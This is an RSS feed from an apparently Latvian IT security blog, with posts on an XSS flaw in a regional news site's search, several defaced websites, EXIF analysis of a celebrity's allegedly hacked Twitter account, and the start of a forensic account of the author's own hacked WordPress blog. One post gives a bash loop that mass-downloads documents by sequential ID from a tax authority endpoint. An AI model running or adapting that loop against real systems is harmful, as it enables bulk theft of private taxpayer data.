<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT sviestapika &#187; IT</title>
	<atom:link href="http://dll.lv/tag/it/feed" rel="self" type="application/rss+xml" />
	<link>http://dll.lv</link>
	<description>Par IT un ne tikai</description>
	<lastBuildDate>Sat, 28 Apr 2012 07:53:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>www.zz.lv un XSS</title>
		<link>http://dll.lv/www-zz-lv-un-xss?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=www-zz-lv-un-xss</link>
		<comments>http://dll.lv/www-zz-lv-un-xss#comments</comments>
		<pubDate>Mon, 17 Jan 2011 07:00:51 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[easy hack]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[kodējam]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[zz.lv]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1427</guid>
		<description><![CDATA[Mājās drusku pabakstoties atklājās, ka Zemgales ziņas mājas lapas meklēšanas funkcionalitātē ir XSS ievainojamība. Pieņemu, ka tāda pati problēma ir visās AS Dienas reģionālo avīžu mājas lapās. Pilnībā atvēzēties liedz tas, ka tiek atfiltrēts „=” simbols. Par XSS var palasīt: &#8230; <a href="http://dll.lv/www-zz-lv-un-xss">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
<li><a href='http://dll.lv/uzlauzts-chrysler-lv' rel='bookmark' title='Uzlauzts Chrysler.lv'>Uzlauzts Chrysler.lv</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Mājās drusku pabakstoties atklājās, ka <a href="http://zz.lv" target="_blank">Zemgales ziņas</a> mājas lapas meklēšanas funkcionalitātē ir XSS ievainojamība. Pieņemu, ka tāda pati problēma ir visās AS Dienas reģionālo avīžu mājas lapās.<br />
Pilnībā atvēzēties liedz tas, ka tiek atfiltrēts „=” simbols.<br />
Par XSS var palasīt:</p>
<p><a href="http://hakipedia.com/index.php/Cross_Site_Scripting" target="_blank">http://hakipedia.com/index.php/Cross_Site_Scripting</a><br />
<a href="http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" target="_blank"> http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</a><br />
<a href="http://ha.ckers.org/xss.html" target="_blank"> http://ha.ckers.org/xss.html</a><br />
<a href="http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html" target="_blank"> http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html</a><br />
<a href="http://dll.lv/wp-content/uploads/2011/01/zz_lv.png"><img class="aligncenter size-medium wp-image-1428" title="zz_lv" src="http://dll.lv/wp-content/uploads/2011/01/zz_lv-300x225.png" alt="" width="300" height="225" /></a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
<li><a href='http://dll.lv/uzlauzts-chrysler-lv' rel='bookmark' title='Uzlauzts Chrysler.lv'>Uzlauzts Chrysler.lv</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/www-zz-lv-un-xss/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Ar igtrade.lv noticis nesmukums</title>
		<link>http://dll.lv/ar-igtrade-lv-noticis-nesmukums?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ar-igtrade-lv-noticis-nesmukums</link>
		<comments>http://dll.lv/ar-igtrade-lv-noticis-nesmukums#comments</comments>
		<pubDate>Sun, 28 Nov 2010 06:44:46 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[easy hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[ihack]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[web izstrāde]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1360</guid>
		<description><![CDATA[Klejojot par internetu un meklējot ceļojumus iegāju igtrade.lv lapā. No google.com piedāvātā linka izskatās, ka kādreiz bija joomla, bet tagad&#8230; Piefiksēšu vēsturei. Related posts: Uzlauzts Chrysler.lv Hackeri uzbrūk vai gadās arī tā Kapitals.lv
Related posts:<ol>
<li><a href='http://dll.lv/uzlauzts-chrysler-lv' rel='bookmark' title='Uzlauzts Chrysler.lv'>Uzlauzts Chrysler.lv</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
<li><a href='http://dll.lv/kapitals-lv' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Klejojot par internetu un meklējot ceļojumus iegāju igtrade.lv lapā. No google.com piedāvātā linka izskatās, ka kādreiz bija joomla, bet tagad&#8230;<br />
Piefiksēšu vēsturei.<span id="more-1360"></span><br />
<a href="http://dll.lv/wp-content/uploads/2010/11/igtrade.png"><img class="aligncenter size-medium wp-image-1361" title="igtrade" src="http://dll.lv/wp-content/uploads/2010/11/igtrade-300x225.png" alt="" width="300" height="225" /></a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/uzlauzts-chrysler-lv' rel='bookmark' title='Uzlauzts Chrysler.lv'>Uzlauzts Chrysler.lv</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
<li><a href='http://dll.lv/kapitals-lv' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ar-igtrade-lv-noticis-nesmukums/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Pods izsmiets vai vēsture atkārtojas</title>
		<link>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pods-izsmiets-vai-vesture-atkartojas</link>
		<comments>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas#comments</comments>
		<pubDate>Fri, 06 Aug 2010 19:55:59 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[drošības likums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1195</guid>
		<description><![CDATA[Tiko uzrakstīju post par boot izsmiešanu un gribas palasīt ko citu. Un te seko nākamais pārsteigums- pods izsmiets. Nu ko vēsture atkārtojas.. Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad &#8230; <a href="http://dll.lv/pods-izsmiets-vai-vesture-atkartojas">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets' rel='bookmark' title='Boot bīstama lapa vai arī boot ticis izsmiets'>Boot bīstama lapa vai arī boot ticis izsmiets</a></li>
<li><a href='http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2' rel='bookmark' title='Second step in forensic investigation vai hackeri uzbrūk 2'>Second step in forensic investigation vai hackeri uzbrūk 2</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Tiko uzrakstīju post par <a href="http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets" target="_blank">boot</a> izsmiešanu un gribas palasīt ko citu.</p>
<p>Un te seko nākamais pārsteigums- pods izsmiets.<br />
<a href="http://dll.lv/wp-content/uploads/2010/08/pods.png"><img class="aligncenter size-medium wp-image-1196" title="pods" src="http://dll.lv/wp-content/uploads/2010/08/pods-300x168.png" alt="" width="300" height="168" /></a></p>
<p>Nu ko vēsture atkārtojas..</p>
<p>Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.</p>
<p>Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.</p>
<p>Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.</p>
<p>Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV</p>
<p>No sava Hackera neaizbēgsi <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets' rel='bookmark' title='Boot bīstama lapa vai arī boot ticis izsmiets'>Boot bīstama lapa vai arī boot ticis izsmiets</a></li>
<li><a href='http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2' rel='bookmark' title='Second step in forensic investigation vai hackeri uzbrūk 2'>Second step in forensic investigation vai hackeri uzbrūk 2</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Kā tika nolādēti dati no VID EDS sistēmas?</title>
		<link>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ka-tika-noladeti-dati-no-vid-eds-sistemas</link>
		<comments>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas#comments</comments>
		<pubDate>Wed, 04 Aug 2010 07:30:21 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[EDS]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[VID]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1187</guid>
		<description><![CDATA[Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas. Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds: Linux veidīgā konsolē uzrakstām &#8230; <a href="http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/no-vid-eds-tiek-nopludinata-informacija' rel='bookmark' title='No VID EDS tiek nopludināta informācija'>No VID EDS tiek nopludināta informācija</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
<li><a href='http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2' rel='bookmark' title='Second step in forensic investigation vai hackeri uzbrūk 2'>Second step in forensic investigation vai hackeri uzbrūk 2</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.<br />
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:<br />
Linux veidīgā konsolē uzrakstām un priecājamies</p>
<blockquote><p><code>for i in {1..7500000}; do<br />
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;<br />
done</code></p></blockquote>
<p>Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/no-vid-eds-tiek-nopludinata-informacija' rel='bookmark' title='No VID EDS tiek nopludināta informācija'>No VID EDS tiek nopludināta informācija</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
<li><a href='http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2' rel='bookmark' title='Second step in forensic investigation vai hackeri uzbrūk 2'>Second step in forensic investigation vai hackeri uzbrūk 2</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Uzlauzts Chrysler.lv</title>
		<link>http://dll.lv/uzlauzts-chrysler-lv?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=uzlauzts-chrysler-lv</link>
		<comments>http://dll.lv/uzlauzts-chrysler-lv#comments</comments>
		<pubDate>Mon, 02 Aug 2010 20:54:40 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[pieredze]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1178</guid>
		<description><![CDATA[Šodien pamanīju, ka uzlauzta Chrysler.lv mājaslapa un lai saglabātu piemiņu par šo atgadījumu ierakstīšu nelielu post. Cik noprotu lapa ir vienkārši nonesta, līdzīgi kā atgadījās ar mani un daudziem citiem. Interesanti būtu uzzināt chrysler adminu novērojumus un veidu kā tas tika izdarīts, &#8230; <a href="http://dll.lv/uzlauzts-chrysler-lv">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/kapitals-lv' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Šodien pamanīju, ka uzlauzta Chrysler.lv mājaslapa un lai saglabātu piemiņu par šo atgadījumu ierakstīšu nelielu post.</p>
<p>Cik noprotu lapa ir vienkārši nonesta, līdzīgi kā atgadījās ar mani un daudziem citiem.</p>
<p>Interesanti būtu uzzināt chrysler adminu novērojumus un veidu kā tas tika izdarīts, bet kā parasti par to tiks noklusēts <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Ņemot vērā, ka lapa tika atjaunot vismaz rezerves kopija viņiem bija. Par to arī prieks.</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/08/20100801-chrysler.png"><img class="aligncenter size-medium wp-image-1179" title="20100801-chrysler" src="http://dll.lv/wp-content/uploads/2010/08/20100801-chrysler-300x148.png" alt="" width="300" height="148" /></a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/kapitals-lv' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/uzlauzts-chrysler-lv/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Gadās arī tā vai hackeri uzbrūk Hayley Williams</title>
		<link>http://dll.lv/gadas-ari-ta-vai-hackeri-uzbruk-hayley-williams?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=gadas-ari-ta-vai-hackeri-uzbruk-hayley-williams</link>
		<comments>http://dll.lv/gadas-ari-ta-vai-hackeri-uzbruk-hayley-williams#comments</comments>
		<pubDate>Wed, 02 Jun 2010 06:55:27 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Domu grauds]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Hayley Williams]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[joks]]></category>
		<category><![CDATA[twiter]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1150</guid>
		<description><![CDATA[Šodien izlasīju tvnet rakstu par uzlauztu Hayley Williams twiter kontu. Tēma likās interesanta un izdomāju to mazliet papētīt&#8230; Kas tad bija it kā izdarīts? 1. Hackers it kā piekļuva viņas kontam un publicēja &#8220;privātu&#8221; foto. 2. Viņa pēc 8 min. &#8230; <a href="http://dll.lv/gadas-ari-ta-vai-hackeri-uzbruk-hayley-williams">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
<li><a href='http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2' rel='bookmark' title='Second step in forensic investigation vai hackeri uzbrūk 2'>Second step in forensic investigation vai hackeri uzbrūk 2</a></li>
<li><a href='http://dll.lv/kluda-paskaidrojuma-vai-ari' rel='bookmark' title='Kļūda paskaidrojumā vai arī..'>Kļūda paskaidrojumā vai arī..</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Šodien izlasīju tvnet <a href="http://www.tvnet.lv/muzika/jaunumi/332965-uzlauzts_heilijas_viljamsas_tviteris" target="_blank">rakstu</a> par uzlauztu Hayley Williams twiter kontu.</p>
<p>Tēma likās interesanta un izdomāju to mazliet papētīt&#8230;</p>
<p>Kas tad bija it kā izdarīts?</p>
<p>1. Hackers it kā piekļuva viņas kontam un publicēja &#8220;privātu&#8221; foto.</p>
<p>2. Viņa pēc 8 min. to pamanīja un bildi izdzēsa.<span id="more-1150"></span></p>
<p>Kas šajā stāstā neiet kopā?</p>
<p>1. Pasākums notika pa nakti un diez vai cilvēks var dažu minūšu laikā pamanīt nesankcionēti publicētu info (kaut gan visādi var būt).</p>
<p>2. Apskatot foto Efix izrādās, ka foto ir uzņemts dažas minūtes pirms pirms tā publicēšanas ar BlackBerry 9000.</p>
<p>3. Apskatot bildi var izdarīt secinājumu, ka pati sevi arī ir bildējusi.</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/06/williams.png"><img class="aligncenter size-medium wp-image-1151" title="williams" src="http://dll.lv/wp-content/uploads/2010/06/williams-223x300.png" alt="" width="223" height="300" /></a>Exif properties apskatīju pats- varat pārliecināties par to, apskatot bildes <a href="http://www.idontlikeyouinthatway.com/pictures/20100527/Hayley%20Williams%20Topless/hayley-williams-topless-0.jpg" target="_blank">oriģinālu</a>.</p>
<p>Šo pasākumu neatklāju es, bet par to izlasīju <a href="http://technorati.com/entertainment/celebrity/article/paramores-hayley-williams-phone-hacked-topless/" target="_blank">te</a> un vēlējos to pārbaudīt.</p>
<p>Kas ir Exif var palasīt <a href="http://en.wikipedia.org/wiki/Exchangeable_image_file_format" target="_blank">te</a>.</p>
<p>Protams saglabājas iespēja, ka hackers pirms bildes publicēšanas ir izmainījis Exif datus, bet tas jau izklausās baigi sarežģīti.</p>
<p>Nelielu ieskatu BlackBerry pasaulē var iegūt Aivara apskatā <a href="http://aivars-blackberry.blogspot.com/" target="_blank">te</a>.</p>
<p>Gala secinājums.</p>
<p>Šis gadījums vairāk izskatās pēc mārketinga trika, neveiksmīgas kļūdas pievienojot attēlu vai netīšām nosūtot nepareizam adresātam un cenšoties sevi attaisnot piesauca hacker vārdu.</p>
<p>Biju jau piemirsis cik daudz interesantas un noderīgas informācija var sniegt foto <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Par twiter hakošanu-</p>
<p>Googlē lielākā pieejamā informācija ir par lietotājvārda un paroles Brute force.</p>
<p>Otrā iespēja ir izmantojot <strong>kaut kādu</strong> exploitu, kuru man neizdevās atrast vai arī &#8220;<a href="http://threatpost.com/en_us/blogs/twitter-outage-dns-hack-121809" target="_blank">twiter DNS ievainojamību</a>&#8220;, lai publicētu nepatiesu informāciju.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
<li><a href='http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2' rel='bookmark' title='Second step in forensic investigation vai hackeri uzbrūk 2'>Second step in forensic investigation vai hackeri uzbrūk 2</a></li>
<li><a href='http://dll.lv/kluda-paskaidrojuma-vai-ari' rel='bookmark' title='Kļūda paskaidrojumā vai arī..'>Kļūda paskaidrojumā vai arī..</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/gadas-ari-ta-vai-hackeri-uzbruk-hayley-williams/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Second step in forensic investigation vai hackeri uzbrūk 2</title>
		<link>http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=second-step-in-forensic-investigation-vai-hackeri-uzbruk-2</link>
		<comments>http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2#comments</comments>
		<pubDate>Sun, 16 May 2010 10:18:42 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[autentifikācija]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[IT projektu problēms]]></category>
		<category><![CDATA[kodējam]]></category>
		<category><![CDATA[pieredze]]></category>
		<category><![CDATA[projekti]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1085</guid>
		<description><![CDATA[Nedēļu atpakaļ notika vēl viens interesants notikums, par kuru nebija laiks uzrakstīt. Bet tā kā tas bija gana aizraujošs un iespējams kādam ļoti noderīgs, tad 6dienas dienā nolēmu to aprakstīt. Viss sākās ar to, ka atnākot 5dien mājās atvēru pārlūkā &#8230; <a href="http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Nedēļu atpakaļ notika vēl viens interesants notikums, par kuru nebija laiks uzrakstīt.<br />
Bet tā kā tas bija gana aizraujošs un iespējams kādam ļoti noderīgs, tad 6dienas dienā nolēmu to aprakstīt.</p>
<p>Viss sākās ar to, ka atnākot 5dien mājās atvēru pārlūkā savu blogu un tur man priekšā sagaidīja šāda bilde:</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/dllhacked.png"><img class="aligncenter size-medium wp-image-1098" title="dllhacked" src="http://dll.lv/wp-content/uploads/2010/05/dllhacked-300x168.png" alt="" width="300" height="168" /></a></p>
<p><span id="more-1085"></span>No sākuma cerēju, ka tas ir kaut kāds gļuks (naivi ne?) un atvēru administrēšanas paneli, bet tur tiešām kā pēdējais raksts rādījās &#8220;Hacked by n2n&#8221;.</p>
<p>Jocīgi bija arī tas, ka visi raksti kopš 2009. gada bija ievietoti &#8220;Trash&#8221;.</p>
<p>Pieņemu, ka nedarbs pastrādāts un brīnumdaris licis mani mierā, lēnā garā mēģinu saprast kas un kā.</p>
<p>Bet, kas tev deva- pēc aptuveni 1. minūtes pienāk epasts no wordpress- admin lietotājam nomainīts epasts un pieprasīta jauna parole.</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/hacked_user.png"><img class="aligncenter size-medium wp-image-1100" title="hacked_user" src="http://dll.lv/wp-content/uploads/2010/05/hacked_user-300x168.png" alt="" width="300" height="168" /></a></p>
<p>Skaidrs tagad džekiņš jau mēģina tikt pie wordpress admin konsoles. Neko darīt- jābloķē viņam pieeja <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>No teorijas- ja vari kontrolēt ko tieši brīnumdaris (hacker) dara tavā lapā, serverī, utt, tas neapdraud draudu konfidencialitāti, integritāti, pieejamību, un ja tas palīdzēs viņu noķert, tad pieeju var riskēt saglabāt.</p>
<p>Ātri ielogojos hostera config panelī un aizliedzu piekļūt visam saturam (izņemot no manas IP).</p>
<p>Darīts- jāsāk skatīties kapēc tas varēja notikt-</p>
<p>Sāku tāpat, kā iepriekšējā rakstā par <a href="http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta" target="_blank">testa vides problēmām</a> ar webalizer un awstat analīzi.</p>
<p>Skatos references:</p>
